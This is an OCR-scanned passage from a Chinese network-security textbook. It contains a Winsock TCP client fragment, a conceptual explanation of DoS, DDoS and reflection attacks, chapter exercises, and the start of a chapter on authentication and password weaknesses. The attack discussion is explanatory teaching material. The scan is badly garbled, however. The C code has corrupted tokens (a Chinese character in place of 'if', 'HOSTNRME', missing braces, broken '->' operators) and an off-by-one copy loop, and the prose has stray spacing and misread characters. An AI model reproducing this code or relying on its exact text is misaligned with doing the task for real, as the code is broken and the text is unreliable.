if((ServerSock = socket(AF_INET, SOCK_ STREAM, 0)) == INVALID SOCKET) 

{ 
wsprintf( szError, TEXT("Allocating socket failed. Error: %d"), WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Error"), MB_OK); 
return FALSE; 
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} 

// 填 写 地 址 信息 (IP 地 址 和 端口 号 ) 

destination sin.sin family = AF_INET; 

// 检 索 与 主机 名 相对 应 的 主机 信息 

证 ((phostent = gethostbyname (HOSTNRME)) == NULL) 

{ 
wsprintf( szError, TEXT( "Unable to get the host name. Error: %d"),WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Error"), MB OK); 
closesocket (ServerSock); 
return FALSE; 

} 

// 分 配套 接 字 IP 地 址 

memcpy ((char FRR * )&(destination sin. sin addr), phostent 一 > h_ addr，phostent 一 > 
h length); 

// 转 换 为 网 络 编号 

destination sin. sin port = htons (PORTNUM); 

// 与 服务 器 连接 

if(connect(ServerSock, (PSOCKADDR) &destination sin, sizeof(destination sin)) == SOCKET_ 
ERROR) 


wsprintf( szError, TEXT("Connecting to the server failed. Error: %d"), 
WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Error"), MB_OK); 
closesocket (ServerSock); 
return FALSE; 
} 
// 发 送 字符 串 给 服务 器 
if(send(ServerSock, "To Server.", strlen ("To Server.") + 1, 0) == SOCKET ERROR) 
{ 
wsprintf( szError, TEXT("Sending data to the server failed. Error: %d"), 
WSAGetLastError ()); 
MessageBox( NULL, szError, TEXT("Error"), MB_OK); 
} 
// 禁 止 ServerSock 上 的 发 送 
shutdown (ServerSock, 0x01); 
for (;;) 
// 从 服务 器 套 接 字 接收 数据 
iReturn = recv (ServerSock, szClientA, sizeof (szClientA), 0); 
// 检 查 是 否 有 已 接收 的 数据 ,如 果 有 , 则 显示 
if (iReturn == SOCKET ERROR) 


{ 
wsprintf( szError, TEXT("No data is received, recv failed. %d"), WSAGetLastError ()); 
MessageBox (NULL, szError, TEXT("Client"), MB_OK); 
break; 

} 

else if (iReturn == 0) 

{ 


MessageBox (NULL, TEXT("Finished receiving data"), TEXT("Client"),MB OK); 
break; 
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else 


// 将 ASCII 串 转 换 成 Unicode 串 
for(index = 0; index <= sizeof (szClientA); index++) 
szClientW[ index] = szClientA[ index]; 
// 显 示 收 到 的 信息 
MessageBox( NULL, szClientW, TEXT("Received From Server"), MB OK); 
} 
// 禁 止 ServerSock 上 的 接收 
shutdown (ServerSock, 0x00); 
// 关 闭 套 接 字 
closesocket (ServerSock); 
WSACleanup (); 
return TRUE; 


2.7 拒绝 服务 攻击 


拒绝 服务 的 英文 是 Denial of Service(DoS)。 这 种 攻击 行动 使 网 站 服务 器 充斥 大 量 要 
求 回 复 的 信息 ,消耗 网 络 带宽 或 系统 资源 ,导致 网 络 或 系统 不 胜 负荷 以 至 瘫痪 而 停止 提供 正 
常 的 网 络 服务 。 拒 绝 服务 攻击 也 是 非常 常见 的 一 种 攻击 手段 。 本 章 前 面 介 绍 的 多 个 层次 的 
网 络 攻击 技术 中 有 许多 是 为 了 达到 拒绝 服务 的 效果 ,如 IGMPNuke、Land、smurf、teardrop、 
SYN flooding、winnuke、UDP flooding 等 。DoS 攻击 的 受害 者 包括 主机 、 路 由 器 甚至 整个 
网 络 。 


2.7.1 拒绝 服务 攻击 的 原理 


最 简单 的 DoS 攻击 方法 是 利用 系统 的 设计 漏洞 实施 Ping-of-death 这 类 攻击 。 通 常 , 访 
问 Internet 资源 的 用 户 需 要 与 服务 器 建立 连接 ,进行 一 些 信息 的 交互 ,如 图 2. 18 所 示 。 


我 来 了 
加 欢迎 你 
六 本 连接 建立 


图 2.18 正常 情况 下 的 连接 交互 


但 是 ,如 果 发 送 者 发 出 “我 来 了 ”的 连接 请 求 后 立即 离开 ,这 时 ,服务 器 收 到 请 求 却 找 不 
到 发 送 该 请 求 的 客户 端 ,于 是 ,按照 协议 , 它 等 一 段 时 间 后 青 与 客户 端 连接 ,如 图 2. 19 所 示 。 

当然 ,以 上 行为 如 果 是 个 别 的 情况 ,那么 服务 器 可 以 忍受 。 试想, 如果 用 户 传送 众多 要 
求 确认 的 信息 到 服务 器 ,使 服务 器 里 充斥 着 这 种 无 用 的 信息 ,所 有 的 信息 都 有 需要 回复 的 虚 
假 地 址 ,以 至 于 当 服 务 器 试图 回 传 时 却 无 法 找到 用 户 , 这 一 点 非常 类 似 IP 欺骗 的 攻击 手段 。 
服务 器 于 是 暂时 等 候 , 有 时 超过 一 分 钟 , 然 后 再 切断 连接 。 服 务 器 切断 连接 时 ,用 户 再 度 传 
送 新 的 一 批 需要 确认 的 信息 ,这 个 过 程 周而复始 ,最 终 导致 服务 器 瘫痪 而 不 能 提供 正常 的 
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加 人 总 
[| ®@ 你 在 哪儿 ? 再 等 一会儿 


2.19 非 正常 情况 下 的 连接 交互 


服务 。 
另 一 种 类 型 的 DoS 攻击 是 利用 计算 量 很 大 的 任务 耗 尽 被 攻击 主机 的 CPU 资源 ,例如 
需要 进行 加 密 、 解 密 的 操作 。 


2.7.2 分 布 式 拒绝 服务 攻击 


分 布 式 拒绝 服务 (DDoS, Distributed Denial of Service) 是 DoS 的 进一步 演化 。DDoS 
引进 了 客户 /服务 器 机 制 ,增加 了 分 布 式 的 概念 ,集中 成 百 上 千 台 主机 向 目标 主机 发 动 攻击 ， 
使 DoS 的 威力 以 几 十 几 百 倍 的 程度 激增 。DDos 圳 括 了 已 经 出 现 的 各 种 DoS 方法 ,其 破坏 
能 力 巨 大 。DDoS 不 依赖 任何 特定 的 网 络 协议 ,也 不 利用 任何 系统 漏洞 ,由 攻击 者 发 送 大 量 
攻击 分 组 。 攻 击 分 组 可 以 是 各 种 类 型 ,例如 TCP ICMP 和 UDP, 也 可 以 是 这 些 分 组 的 混 
合 ,最 常见 的 攻击 方式 就 是 TCP 的 SYN flooding。 具 体 的 攻击 方式 又 分 为 两 种 : 直接 攻击 
和 反射 攻击 。 

直接 攻击 是 指 攻击 者 的 大 量 攻 击 分 组 直接 发 往 目标 主机 ,如 图 2. 20 所 示 , 其 中 A 是 攻 
击 者 ,V 是 被 攻击 的 主机 ,R 是 不 存在 的 假 地 址 。A 构造 大 量 源 地 址 为 R 的 TCP 连接 请 求 
发 给 V,V 的 响应 发 给 R, 由 于 R 不 存在 ,V 需要 等 待 一 段 时 间 才 能 释放 连接 资源 。 当 存在 
大 量 这 样 的 请 求 时 ,V 的 资源 就 会 耗 尽 。 





A 














TCP SYN, ICMP, UDP 


R ” (R 的 地 址 作为 源 IP 地 址 ) 


TCP SYN-ACK, TCP RST, 
ICMP, UDP V 




















图 2.20 直接 攻击 示意 图 


为 了 提高 分 布 式 拒 绝 服务 攻击 的 成 功率 ,攻击 者 需要 控制 成 百 上 千 的 被 入 侵 主机 
(图 2.21)。 这 些 主机 的 操作 系统 通常 是 Linux 和 SUN, 但 这 些 攻 击 工具 也 能 够 移植 到 其 他 平 
台 上 和 运行。 这 些 攻 击 工 具 入 侵 主 机 和 安装 程序 的 过 程 都 是 自动 化 的 ,可 分 为 以 下 几 个 步骤 ， 

(1) 探测 扫描 大 量 主机 以 寻找 可 入 侵 主机 目标 。 

(2) 入 侵 有 安全 漏洞 的 主机 并 获取 控制 权 。 

(3) 在 每 台 和 人 侵 主 机 中 安装 攻击 程序 ,使 之 成 为 俐 偶 机 。 

(4) 利用 倪 偶 机 继续 进行 扫描 和 入 侵 。 

反射 攻击 是 一 种 间接 攻击 (图 2. 22) ,攻击 者 利用 中 间 节 点 (包括 路 由 器 和 主机 ,又 称 为 
反射 节点 ) 发 送 大量 需 要 响应 的 分 组 ,并 将 这 些 分 组 的 源 地 址 设置 为 被 攻击 主机 的 地 址 。 由 
于 反射 节点 并 不 知道 这 些 分 组 的 源 地 址 是 经 过 伪装 的 ,反射 节点 将 把 这 些 分 组 的 响应 分 组 
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发 往 被 攻击 主机 ,造成 被 攻击 主机 被 大 量 响应 分 组 淹没 (图 2. 23)。 


ya 
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攻击 使 伪 机 器 加 
TCP SYN, ICMP, UDP 
(使 用 伪造 的 源 IP 地 址 ) 
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被 改 计 贡 
图 2.21 分 布 式 拒绝 服务 一 一 直接 攻击 图 2.22 反射 攻击 示意 图 
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被 攻击 主机 
图 2.23 分 布 式 拒绝 服务 一 反射 攻击 
发 起 反射 攻击 之 前 ,必须 有 一 组 预先 确定 的 反射 节点 ,包括 DNS 服务 器 .HTTP 服务 
器 、 路 由 器 等 。 攻 击 分 组 的 数量 由 反射 节点 的 数量 、 分 组 发 送 速 率 和 反射 分 组 的 大 小 决定 。 
由 于 整个 过 程 的 自动 化 ,攻击 者 能 够 在 几 秒 内 入 侵 一 台 主 机 并 安装 攻击 工具 。 也 就 是 
说 ,在 短 短 的 一 小 时 内 可 以 入 侵 数 千 台 主机 。 然 后 ,通过 这 些 主机 再 去 攻击 目标 主机 。 所 
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以 ,对 于 分 布 式 拒绝 服务 攻击 ,目前 难以 找到 有 效 的 抵御 方法 。 

2000 年 2 月 ,众多 黑客 在 3 天 的 时 间 里 使 美国 数 家 顶级 互联 网 站 (包括 雅虎 .亚马逊 、 
电子 港湾 .CNN 等 ) 均 陷入 瘫痪 。 他 们 使 用 的 就 是 拒绝 服务 攻击 手段 , 即 用 大 量 无 用 信息 阻 
塞 网 站 的 服务 器 ,使 其 不 能 提供 正常 服务 。 

主要 的 DDoS 工具 有 Trinoo、TFN、Stacheldraht、mstream 等 。 其 中 Trinoo 的 DDoS 
攻击 程序 成 功 地 构造 了 主机 数 大 于 2000 台 的 攻击 网 络 。 

目前 来 看 ,还 没有 绝对 有 效 的 方法 来 对 付 拒绝 服务 攻击 。 因 此 ,只 能 采取 一 些 防 范 措 
施 , 如 优化 路 由 和 网 络 结构 ,禁止 一 切 不 必要 的 服务 等 ,以 避免 计算 机 成 为 被 利用 的 工具 或 
者 成 为 被 攻击 的 对 象 。 





2.8 本 章 小 结 


随 着 Internet 的 广泛 应 用 ,网 络 也 时 时 刻 刻 要 面 对 各 种 各 样 的 攻击 ,这 些 攻 击 多 数 针对 
网 络 系统 自身 的 种 种 弱点 。 本 章 首 先 介绍 了 一 些 国内 外 著名 的 黑客 攻击 案例 ,攻击 手法 和 
攻击 过 程 。 然 后 根据 Internet 的 体系 结构 ,介绍 了 各 个 层次 的 主要 攻击 方法 及 其 工作 原理 。 
物理 层 和 数据 链 路 层 的 攻击 主要 包括 MAC 地 址 欺骗 .电磁 泄漏 监听 和 对 链 路 的 监听 ; 网 
络 层 的 攻击 手段 众多 ,主要 基于 IP 欺骗 .碎片 攻击 .路 由 欺骗 和 ARP 欺骗 ; 传输 层 的 攻击 
包含 端口 扫描 ,TCP 序号 攻击 和 TCP 欺骗 等 ; 而 应 用 层 的 攻击 包括 缓冲 区 溢出 \ 口 令 攻 击 、 
电子 邮件 攻击 和 DNS 欺骗 等 手段 。 

本 章 还 介绍 了 网 络 病毒 .特洛伊 木马 和 拒绝 服务 攻击 。 特 洛 伊 木 马 的 历史 悠久 ,但 是 发 
现 和 删除 特洛伊 木马 并 不 容易 ; 拒绝 服务 攻击 使 得 检测 者 很 难 发 现 真正 的 对 手 在 何 处 , 因 
为 攻击 来 自 成 千 上 万 被 黑客 控制 的 计算 机 。 这 种 攻击 也 很 难 有 效 预防 ,只 能 加 强 对 网 络 数 
据 流量 的 监控 。 

随 着 Internet 的 发 展 和 普及 ,各 种 攻击 技术 也 在 不 断 发 展 ,这 就 要 求 建设 网 络 系统 时 要 
在 网 络 人 侵 检 测 方面 投入 更 多 的 精力 ,对 系统 进行 实时 监控 ,并 且 及 时 堵 住 发 现 的 安全 
漏洞 。 


2.9 本 章 习 题 


1. 网 络 攻击 中 的 被 动 攻击 和 主动 攻击 有 什么 区 别 ? 

2. 假设 主机 A 的 IP 地 址 为 172. 20.1.1, 主 机 B 的 IP 地址 为 172.30.1.1, 如 果 主 机 B 
运行 Sniffer 程序 ,而 主机 A 接收 邮件 时 需要 他 输入 账户 名 和 口令 ,请 问 ,主机 B 的 Sniffer 
程序 能 否 检 测 到 主机 A 所 发 出 的 信息 包 ? 主机 A 能 否 放心 地 进行 账户 和 口令 的 输入 ? 

3. 简 述 重 放 攻 击 的 原理 和 几 种 防范 措施 。 

4. 扫描 器 是 不 是 一 种 攻击 手段 ? 请 在 Linux/UNIX 系统 中 调试 附录 中 的 两 个 扫描 器 
的 例子 。 

5. 请 实际 使 用 手工 扫描 命令 ping、tracert.,finger、rusers 和 hosts, 并 对 实际 输出 结果 
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进行 分 析 。 

6. 缓冲 区 溢出 的 原理 是 什么 ? 

7. 简 述 SQL 注入 攻击 的 原理 和 步 又 。 

8. 病毒 是 一 种 特洛伊 木马 吗 ? 请 讨论 二 者 的 关系 。 

9. 特洛伊 木马 为 什么 不 容易 发 现 和 删除 ? 请 给 出 你 的 方法 。 

10. 请 查阅 资料 ,分 析 一 种 针对 分 布 式 拒绝 服务 攻击 的 防范 措施 。 

11. 交换 机 的 工作 机 制 与 传统 的 集线器 完全 不 同 , 交 换 机 端口 之 间 传 输 的 信息 是 否 能 
够 被 监听 ? 


第 3 章 网 络 身份 认证 


进入 网 络 系统 的 用 户 首先 需要 进行 身份 认证 ,获取 进入 网 络 大 门 的 许可 。 常 见 的 网 络 
身份 认证 方式 有 口令 认证 IC 卡 认证 、 基 于 生物 特征 的 认证 和 双 因 子 认 证 等 。 网 络 环境 下 
的 身份 认证 一 般 通过 某 种 身份 认证 协议 来 实现 。 身 份 认证 协议 一 般 基 于 密码 相关 技术 实 
现 , 定 义 了 参与 认证 服务 的 各 通信 方 在 身份 认证 过 程 中 需要 交换 的 所 有 消息 的 格式 .这些 消 
息 发 生 的 次 序 以 及 消息 的 语义 。 本 章 最 后 以 单 点 登录 为 例 说 明 网 络 身份 认证 的 应 用 。 

本 章 主 要 内 容 : 

。 网 络 身份 认证 概述 

。 常 用 网 络 身份 认证 技术 

。 网 络 身份 认证 协议 

。 单 点 登录 


3.1 网 络 身份 认证 概述 


3.1.1 身份 认证 案例 


随 着 互联 网 用 户 对 于 网 络 的 使 用 程度 在 不 断 加 深 ,国内 各 行业 也 积极 拥抱 互联 网 ,将 互 
联网 的 技术 和 思维 运用 到 生产 、 运 输 、 营 销 、 服 务 等 环节 ,新 技术 、 新 模式 、 新 业态 正在 不 断 涌 
现 。 互 联网 在 给 人 们 带 来 便利 的 同时 ,也 日 益 威 胁 到 个 人 和 企业 的 信息 安全 。 全 球 互联 的 
网 络 世界 中 也 充斥 着 计算 机 病毒 和 黑客 ,个 人 信息 泄露 ,非法 窃听 和 电子 欺诈 等 案例 时 有 
发 生 。 

2011 年 ,360 安全 卫士 官 方 微 博 发 布 了 一 条 紧急 通知 , 称 CSDN (Chinese Software 
Developer Network) 网 站 历史 数据 库 遭 黑客 人 侵 ,600 余 万 用 户 数据 泄密 。 其 主要 原因 是 ， 
在 2009 年 4 月 之 前 ,CSDN 网 站 以 明文 方式 存储 和 传输 用 户 的 个 人 信息 ,未 采取 任何 加 密 
措施 ,黑客 人 侵 系 统 后 ,可 以 轻易 地 获取 用 户 信 息 , 并 公开 用 户 信息 数据 库 。 以 同样 原因 泄 
露 用 户 信息 的 类 似 事件 在 近 几 年 频频 发 生 .2012 年 近 2 亿 UC 手机 浏览 器 用 户 面临 泄密 威 
胁 , 主 要 原因 在 于 UC 浏览 器 的 快捷 上 网 功能 采用 了 一 种 压缩 中 转 技术 , 当 用 户 通过 UC 浏 
览 器 登录 Gmail 等 网 站 时 ,UC 浏览 器 会 把 用 户 访问 的 URL 地 址 和 提交 的 信息 发 送 到 附近 
的 一 台 UC 服务 器 ,这 里 存在 的 漏洞 是 ,UC 浏览 器 手机 端 和 UC 服务 器 之 间 包 括 用 户 名 和 
密码 在 内 的 所 有 信息 均 为 明文 传输 ,这 使 得 UC 浏览 器 和 UC 服务 器 之 间 的 通信 可 以 被 监 
听 和 抓 包 , 第 三 方 可 以 通过 这 种 方法 获取 手机 用 户 的 账户 、 密 码 等 敏感 信息 ,用 户 通 过 UC 
浏览 器 登录 的 任何 网 站 都 会 被 监听 ,包括 邮箱 、 网 站 后 台 、 网 银 、 网 上 支付 等 。 

除 此 之 外 ,由 于 用 户 的 密码 强度 过 低 而 导致 信息 泄露 的 案例 也 屡见不鲜 。 例 如 ,2013 
年 ,Adobe 巾 于 密码 设 定 强度 过 低 而 遭 到 黑客 大 量 破解 ,可 任意 获取 用 户 的 相关 数据 , 约 有 
1. 52 亿 用 户 受到 影响 。 而 以 系统 内 部 人 员 身 份 进行 非法 攻击 和 信息 倒卖 的 事件 也 时 有 发 
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生 ,2014 年 ,eBay 部 分 员工 的 登录 凭证 遭 黑 , 导 致 内 部 数据 库 可 被 截取 ,攻击 时 间 长 达 两 个 
月 , 约 有 1.45 亿 用 户 受 到 影响 。2014 年 ,支付 宝 前 技术 人 员 李 某 利用 其 工作 之 便 ,多 次 在 
公司 后 台 下 载 支付 宝 用 户 的 资料 ,资料 内 容 超 过 20GB, 随 后 将 用 户 信 息 多 次 出 售 给 电 商 公 
司 、 数 据 公 司 。 

由 于 各 种 原因 而 引发 的 用 户 身份 信息 泄露 不 仅 危 及 人 们 的 人 身 安 全 和 财产 安全 ,甚至 
能 够 危及 国家 的 安全 和 发 展 。 而 且 身 份 认证 作为 保护 用 户 信息 安全 和 系统 安全 的 第 一 道 防 
线 ,在 网 络 安全 建设 过 程 中 占据 重要 地 位 。 因 此 ,对 网 络 身份 认证 的 进一步 研究 已 经 迫 在 
眉 睫 。 

网 络 环境 下 的 身份 认证 就 是 指 通过 一 定 的 认证 技术 来 确认 相关 用 户 和 通信 实体 身份 ， 
进而 确定 该 用 户 和 通信 实体 是 否 具有 对 某 种 资源 的 访问 和 使 用 权限 的 过 程 。 现 实生 活 中 ， 
每 个 人 都 拥有 独一无二 的 身份 ,对 人 的 身份 认证 最 常见 的 形式 是 查验 各 种 证 件 实物 (如 身份 
证 .工作 证 等 )。 而 在 计算 机 网 络 环境 中 ,用 户 和 网 络 设备 的 身份 信息 都 是 由 一 组 特定 的 数 
据 表 示 的 数字 标识 ,对 他 们 的 身份 认证 就 是 对 其 数字 身份 的 验证 , 即 验证 他 们 的 现实 身份 与 
数字 身份 是 否 一 致 。 身 份 认 证 技术 就 是 用 来 解决 如 何 保证 用 户 和 网 络 设备 的 数字 身份 与 其 
现实 身份 相 一 致 的 方法 。 

身份 认证 其 实 包 含 两 方面 的 内 容 ,一 是 标识 (identification) ,二 是 验证 Cauthentication ) 。 

(1) 标识 。 用 来 代表 实体 的 身份 ,就 是 要 明确 访问 者 是 谁 ,系统 中 的 实体 标识 必须 具备 
唯一 性 和 可 辨认 性 特征 。 通 过 唯一 标识 符 , 系 统 可 以 识别 出 访问 系统 的 每 个 用 户 或 设备 。 
例如 ,在 网 络 环境 中 ,网 络 管理 员 常 用 IP 地 址 、 网 卡 地 址 作为 计算 机 用 户 的 标识 。 

(2) 验证 。 是 系统 对 实体 提供 的 标识 ( 即 身份 ) 的 真实 性 进行 鉴别 ,以 防止 冒名 顶替 或 
恶意 算 改 。 鉴 别 的 依据 是 用 户 所 拥有 的 特殊 信息 或 实物 ,这 些 信 息 具 有 保密 性 ,其 他 用 户 不 
能 拥有 。 


3.1.2 身份 认证 的 地 位 与 作用 


在 计算 机 网 络 系统 中 ,为 了 防止 各 种 资源 (如 计算 机 硬件 、 软 件 、 存 储 的 数据 等 ) 未 经 授 
权 而 被 泄露 ,使 用 ,破坏 ,必须 实现 访问 控制 ,使 得 只 有 经 过 授权 的 用 户 才 能 以 被 授权 的 方式 
进行 访问 。 而 访问 控制 的 前 提 是 能 够 识别 用 户 的 真实 身份 ,然后 系统 才能 根据 不 同 的 用 户 
身份 授予 不 同 的 访问 权限 ,进而 达到 保护 系统 资源 的 目的 。 例 如 ,通过 IP 地 址 的 识别 ,网 络 
管理 员 可 以 确定 Web 访问 是 内 部 用 户 访问 还 是 外 部 用 户 访问 。 因 此 身份 认证 是 有 效 实施 
其 他 安全 策略 (如 建立 安全 信道 .实施 基于 身份 的 访问 控制 和 审计 记录 等 ) 的 前 提 和 基础 ,是 
保护 系统 安全 的 第 一 道 大 门 ,在 网 络 安全 中 占据 十 分 重要 的 位 置 , 它 的 失效 可 能 导致 整个 系 
统 的 失败 。 

归纳 起 来 ,认证 的 主要 用 途 有 3 个 方面 : 

(1) 验证 用 户 身份 ,为 网 络 系统 访问 控制 服务 提供 支持 。 

(2) 保证 网 络 通信 双方 的 真实 性 ,防止 假冒 ,为 以 后 审计 和 责任 追究 提供 支持 。 

(3) 与 其 他 安全 机 制 相 结合 以 保证 数据 的 完整 性 和 机 密 性 ,防止 自 改 、 重 放 或 延迟 。 


3.1.3 身份 标识 信息 
计算 机 网 络 中 的 身份 认证 包括 用 户 身份 认证 与 设备 身份 认证 。 这 里 以 用 户 身份 认证 为 
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例 。 认 证 过 程 就 是 通过 与 用 户 的 交互 获得 标识 用 户 身 份 的 特殊 信息 (如 用 户 名 /口令 组 合 、 
生物 特征 等 ) ,然后 再 对 身份 信息 进行 核对 处 理 , 根 据 处 理 结果 确认 用 户 身 份 是 否 正 确 。 这 
里 的 正确 指 的 是 用 户 真 实 的 身份 与 数字 身份 相对 应 。 

常用 的 身份 标识 信息 主要 有 4 种 : 

。 用 户 知道 的 信息 ,如 用 户口 令 、PIN(Personal Identification Number, 个 人 识别 码 ) 。 

。 用 户 拥 有 的 实物 ,一 般 是 不 可 伪造 的 设备 ,如 智能 卡 、 磁 卡 等 。 

。 用 户 自身 独一无二 生 的 生物 特征 信息 ,如 指纹 声音、 视网膜 等 。 

。 用 户 所 处 的 位 置 , 如 IP 地 址 (映射 到 一 个 特定 子 网 )、MAC 地 址 (对 应 交换 机 上 的 特 

定 端口 ) 等 。 

上 述 每 种 标识 信息 都 存在 一 些 弱点 ,例如 ,口令 容易 泄露 ,实物 会 遗失 ,IP 地 址 可 以 被 
伪造 ,而 基于 生物 特征 信息 进行 认证 的 技术 复杂 且 成 本 较 高 。 在 实际 应 用 中 ,组 合 使 用 上 述 
的 前 两 种 身份 信息 进行 认证 会 显著 提高 安全 性 ,通常 称 为 双 因 子 身份 认证 。 例 如 ,在 ATM 
机 上 取款 时 ,用 户 同 时 需要 一 个 PIN 号 码 和 一 个 磁卡 。 即 使 有 人 获得 了 PIN 号 码 , 没 有 磁 
卡 仍然 不 能 访问 。 如 果 磁 卡 遗 失 或 被 偷 ,没有 PIN 号 码 也 无 法 使 用 。 当 然 , 随 着 成 本 的 降 
低 , 目 前 基于 生物 特征 的 认证 也 得 到 越 来 越 广泛 的 应 用 ,如 基于 指纹 的 识别 .基于 人 脸 的 识 
别 等 。 


3.1.4 身份 认证 技术 分 类 


可 以 根据 不 同 的 分 类 标准 对 身份 认证 技术 进行 分 类 。 

从 是 否 使 用 硬件 ,身份 认证 技术 分 为 软件 认证 和 硬件 认证 。 

。 软件 认证 是 指 在 身份 验证 过 程 中 不 使 用 实体 硬件 ,用 户 的 身份 验证 信息 依赖 于 各 类 
软件 。 例 如 常用 的 动态 密码 保护 程序 ,在 身份 认证 过 程 中 ,会 通过 密 保 软件 生成 一 
个 动态 密码 ,服务 器 通过 软件 生成 的 动态 密码 对 用 户 身份 进行 鉴别 。 

。 硬件 认证 是 指 用 户 的 身份 验证 信息 与 硬件 相关 联 ,在 身份 验证 过 程 中 需要 用 到 实体 
硬件 。 常 用 的 认证 硬件 有 磁卡 IC 卡 `.USB 令 牌 . 其 他 硬件 令 牌 等 。 

从 认证 需要 验证 的 条 件 来 看 ,身份 认证 技术 分 为 单 因子 认证 和 双 ( 多 ) 因 子 认 证 。 

。 单 因子 认证 是 指 用 户 仅 使 用 一 个 标识 信息 来 验证 自己 的 身份 ,静态 密码 就 是 一 个 典 
型 的 单 因 子 认证 方式 。 

。 双 因 子 认 证 就 是 在 单 因子 认证 的 基础 上 结合 第 二 种 认证 因素 的 双重 认证 机 制 , 从 而 
进一步 加 强 认 证 的 安全 性 。 目 前 使 用 最 为 广泛 的 双 因 子 认证 方法 有 动态 口令 牌 十 
静态 密码 .USB Key 十 静态 密码 二 层 静 态 密码 等 ,其 身份 认证 安全 性 远 远 高 于 单 因 
子 认证 。 

从 认证 信息 来 看 ,身份 认证 技术 分 为 静态 认证 和 动态 认证 。 

。 萎 态 认证 是 指 在 用 户 登录 系统 验证 身份 信息 时 ,用 户 给 服务 器 发 送 的 身份 认证 信息 
是 静态 的 、 固 定 不 变 的 。 例 如 ,采用 静态 口令 认证 机 制 ,用 户 发 送 给 服务 器 的 认证 信 
息 是 一 串 固定 不 变 的 静态 密码 。 

。 动态 认证 是 指 用 户 登 录 系 统 验证 身份 过 程 中 ,发送 给 服务 器 的 认证 信息 是 动态 变化 
的 。 典 型 的 动态 认证 方式 是 如 动态 口令 ,这 种 认证 机 制 会 使 用 户 密 码 随 着 时 间或 者 
使 用 次 数 而 不 断 变化 ,而 且 每 个 密码 只 能 使 用 一 次 。 
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从 需要 认证 的 对 象 可 以 分 为 单 向 认证 、 双 向 认证 和 第 三 方 认证 。 

。 单 向 认证 是 指 通信 的 双方 只 需要 一 方 被 男 一 方 鉴别 身份 ,例如 常见 的 口令 核对 方 
式 , 当 用 户 访问 某 台 服 务 器 时 , 单 向 认证 只 是 由 用 户 向 服务 器 发 送 自己 的 身份 信息 ， 
然后 服务 器 对 其 进行 比 对 检验 ,鉴别 用 户 的 身份 真实 性 。 

。 双向 认证 是 指 通信 双方 需要 互相 认证 鉴别 各 自 的 身份 。 这 主要 应 用 在 对 安全 性 要 
求 很 高 的 系统 中 ,例如 网 上 银行 系统 ,一 方面 银行 网 站 要 对 用 户 身份 进行 认证 , 另 一 
方面 用 户 也 需要 鉴别 银行 网 站 的 真实 性 。 

。 第 三 方 认证 是 指 服务 方 和 用 户 方 的 身份 鉴别 通过 第 三 方 来 实现 。 每 个 用 户 都 把 自 
己 的 身份 验证 信息 发 送 给 可 信 第 三 方 ,由 第 三 方 负责 认证 过 程 。 


3.2 ”常用 网 络 身份 认证 技术 


身份 认证 技术 是 在 计算 机 网 络 中 为 完成 确认 操作 者 身份 的 过 程 而 采用 的 技术 方法 。 
3.2.1 口令 认证 


口令 俗称 密码 ,口令 认证 (也 称 为 用 户 名 (ID) 十 密码 (Password)) 广 泛 应 用 于 计算 机 系 
统 和 日 常生 活 中 ,是 基于 用 户 知 道 的 信息 进行 认证 的 方法 。 每 个 用 户 的 用 户 名 和 密码 可 以 
由 用 户 自 己 设 定 ,也 可 以 由 系统 通过 某 些 渠道 (电子 邮件 .邮寄 等 ) 提 供给 用 户 , 只 有 用 户 自 
己 才 知道 ,所 以 只 要 能 够 正确 输入 用 户 名 和 密码 ,系统 就 认为 用 户 是 合法 的 。 

3.2.1.1 静态 口令 

常用 的 口令 认证 依 机 制 是 依靠 静态 口令 (也 称 为 可 重用 口令 ) 来 鉴别 用 户 身份 的 合法 
性 。 系 统 为 每 一 个 合法 用 户 建立 一 个 用 户 名 /口令 对 , 当 用 户 登录 系统 或 使 用 某 些 功 能 时 ， 
提示 用 户 输入 自己 的 用 户 名 /口令 对 (这 些 用 户 名 /口令 对 在 系统 内 是 加 密 存 储 的 ) ,如 果 与 
某 一 项 用 户 名 /口令 对 匹配 , 则 该 用 户 的 身份 得 到 了 认证 。 具 体 认证 过 程 如 图 3. 1 所 示 。 








用 户 名 /口令 
人 认证 结果 服务 器 
查询 
用 户 数据 库 


图 3.1 静态 口令 认证 过 程 


静态 口令 认证 的 优点 在 于 : 基本 上 所 有 的 计算 机 系统 (如 UNIX、Windows、Linux 等 ) 
都 支持 对 用 户 的 口令 认证 ,认证 方式 简单 ,易于 实现 。 但 这 种 认证 方式 的 安全 性 较 低 ,口令 
容易 泄露 。 造 成 口令 泄露 的 主要 原因 如 下 : 
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账 


只 


了 7 


。 人 为 失误 。 比 如 无 意 中 被 他 人 看 到 ,记录 口令 的 载体 丢失 或 被 窃取 等 。 

。 口令 在 用 户 端 被 截获 。 用 户 在 访问 系统 的 过 程 中 以 明文 的 方式 输入 口令 ,很 容易 被 
驻 留 在 系统 中 的 木马 程序 或 网 络 监听 设备 截获 。 

。 口令 在 传输 过 程 中 被 窃取 。 许 多 网 络 通信 协议 (如 FTP、HTTP、Telnet 等 ) 都 采用 

明文 传输 ,这 就 意味 着 攻击 者 比较 容易 窃取 传输 过 程 中 的 认证 信息 ,从 而 获得 用 户 

问 令 。 

口令 在 系统 端 被 截获 。 用 户口 令 通过 文件 形式 存储 在 系统 端 ,这 就 使 得 攻击 者 可 以 

利用 系统 漏洞 截获 用 户口 令 。 

字典 穷 举 和 猜测 攻击 。 很 多 用 户 为 了 防止 遗忘 口令 ,通常 采用 一 些 有 特定 意义 的 字 

符 串 作为 口令 (如 人 名 .电话 号 码 、 生 日 等 ) ,这 些 口令 一 般 较 短 ,攻击 者 就 会 将 字符 

串 的 全 集 作为 字典 ,对 用 户口 令 进行 穷 举 攻击 和 猜测 攻击 。 

伪造 服务 器 攻击 。 由 于 许多 系统 只 能 进行 单项 认证 , 即 系统 能 够 认证 用 户 , 而 用 户 

无 法 对 系统 进行 认证 ,这 就 使 得 攻击 者 可 以 伪造 服务 器 来 骗取 用 户 的 认证 信息 , 进 

而 获得 用 户 的 口令 信息 ,这 种 攻击 也 称 为 网 络 钓鱼 。 

跨 级 别 重 复 口令 攻击 。 用 户 在 访问 多 个 不 同安 全 级 别 的 系统 时 ,为 了 避免 遗忘 ,经 

常 采用 相同 的 口令 进行 登录 。 低 安全 级 别 系统 的 口令 比较 容易 被 攻击 者 获得 ,从 而 

对 高 安全 级 别 系统 进行 攻击 。 

系统 内 部 人 员 泄 露 。 系 统 的 内 部 人 员 能 够 通过 合法 途径 获取 用 户 的 口令 信息 并 非 

法 使 用 。 

